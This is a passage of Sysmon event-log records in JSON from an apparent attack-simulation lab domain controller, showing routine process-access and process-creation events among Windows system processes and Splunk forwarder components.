C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-0010B8610900}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-0010B8610900}","TargetProcessId":"3496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.162\r\nSourceProcessGUID: {41C8662E-212C-5F25-0000-0010B8610900}\r\nSourceProcessId: 3496\r\nSourceThreadId: 4588\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.162","SourceProcessGUID":"{41C8662E-212C-5F25-0000-0010B8610900}","SourceProcessId":"3496","SourceThreadId":"4588","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.538\r\nProcessGuid: {41C8662E-212C-5F25-0000-001067630900}\r\nProcessId: 1344\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.538","ProcessGuid":"{41C8662E-212C-5F25-0000-001067630900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-001067630900}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-001067630900}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-001067630900}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-001067630900}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 